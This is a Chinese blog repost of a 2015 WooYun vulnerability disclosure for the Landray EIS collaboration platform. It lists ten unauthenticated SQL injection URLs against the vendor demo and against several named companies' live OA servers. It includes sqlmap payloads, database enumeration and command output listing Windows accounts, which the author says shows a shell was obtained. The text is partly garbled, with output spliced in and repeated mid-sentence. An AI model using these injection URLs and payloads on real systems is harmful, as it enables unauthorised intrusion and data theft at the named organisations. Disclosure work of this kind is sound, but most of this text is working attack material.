记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

蓝凌EIS智慧协同平台sql注入+getshell10处打包(demo测试,无需登录)

2015-06-19 04:10

官网demo:eisdemo.landray.com.cn

code 区域
0x1:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

0x2:

http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=1'

0x3:

http://eisdemo.landray.com.cn/webdoc/HtmlSignatureServer.aspx?DocumentID=1'&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE

0x4:

http://eisdemo.landray.com.cn/vote/service.aspx

post:action=voteid&ID=1'

0x5:

http://eisdemo.landray.com.cn/sm/bulkinsert_data.aspx?id=1'

0x6

http://eisdemo.landray.com.cn/sm/data_manager_right_edit.aspx?tableid=1'

0x7:

http://eisdemo.landray.com.cn/sm/DictKey.aspx?DictKey=1'

0x8:

http://eisdemo.landray.com.cn/sm/menu_define.aspx?id=1 and 1=(select @@version)

0x9:

http://eisdemo.landray.com.cn/sm/menu_emp_edit.aspx?ID=(select @@version)

0x10:

http://eisdemo.landray.com.cn/sm/menu_left_edit.aspx?post:action=dragdrop&id=1&parent_id=1 where 1=(select @@version)--



部分案例:

http://oa.hejiangroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://maofugroup.com:8111//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://oa.myzygroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://oa.aixiangqin.com.cn:88//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://oa.hejiangroup.com//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://oa.geheng.com:800//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://oa.aixiangqin.com.cn:88//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://maofugroup.com:8111//webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

http://eis.landray.com.cn/

漏洞证明:

http://eisdemo.landray.com.cn/webdoc/file_download.aspx?guid=19e789719ac343679c070110c147290e'

加单引号返回:

“/”应用程序中的服务器错误。



字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。

'19e789719ac343679c070110c147290e'' 附近有语法错误。



说明: 执行当前 Web 请求期间,出现未经处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。



异常详细信息: System.Data.SqlClient.SqlException: 字符串 '19e789719ac343679c070110c147290e'' 后的引号不完整。

'19e789719ac343679c070110c147290e'' 附近有语法错误。



源错误:



执行当前 Web 请求期间生成了未经处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。



http://eisdemo.landray.com.cn/webdoc/file_show.aspx?id=(select%20@@version)



“/”应用程序中的服务器错误。



在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)

Jun 28 2012 08:36:30

Copyright (c) Microsoft Corporation

Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)

' 转换成数据类型 int 时失败。



说明: 执行当前 Web 请求期间,出现未经处理的异常。请�ND error-based - WHERE or HAVING clause

Payload: id=1 AND 3419=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (3419=3419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113)))



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: id=1; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: id=1 WAITFOR DELAY '0:0:5'--



Type: inline query

Title: Microsoft SQL Server/Sybase inline queries

Payload: id=(SELECT CHAR(113)+CHAR(103)+CHAR(120)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))

---

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420

back-end DBMS: Microsoft SQL Server 2008

available databases [14]:

[*] EISdemo

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a

[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6

[*] Search_Service_Application_DB_3ea5977f6e4b4

1348

6117)+CHAR(113)+(SELECT (CASE WHEN (4391=4391) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(101)+CHAR(108)+CHAR(113))

---

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5, Microsoft Share Point 15.0.0.4420

back-end DBMS: Microsoft SQL Server 2008

available databases [14]:

[*] EISdemo

[*] master

[*] model

[*] msdb

[*] ReportServer

[*] ReportServerTempDB

[*] Search_Service_Application_AnalyticsReportingStoreDB_a40959bae29942a9997792ecfb09122a

[*] Search_Service_Application_CrawlStoreDB_4e7a0e760e424a92ab601663836678a6

[*] Search_Service_Application_DB_3ea5977f6e4b46dc8e12ccaf6aebd519

[*] Search_Service_Application_LinksStoreDB_7f7c2ee474204a4b9b5773950b8735e2

[*] SharePoint_AdminContent_8d9aeb53-99b7-4c74-8e2f-133b2728da14

[*] SharePoint_Config

[*] tempdb

[*] WSS_UsageApplication



command standard output:

---

\\WIN-K56VKIJLEMJ 的用户帐户



-------------------------------------------------------------------------------

Administrator \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Guest \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0krbtgt \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0

---



getshell了吧

修复方案:

厂商懂的


知识来源: www.wooyun.org/bugs/wooyun-2015-0111278

阅读:304200 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“蓝凌EIS智慧协同平台sql注入+getshell10处打包(demo测试,无需登录)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云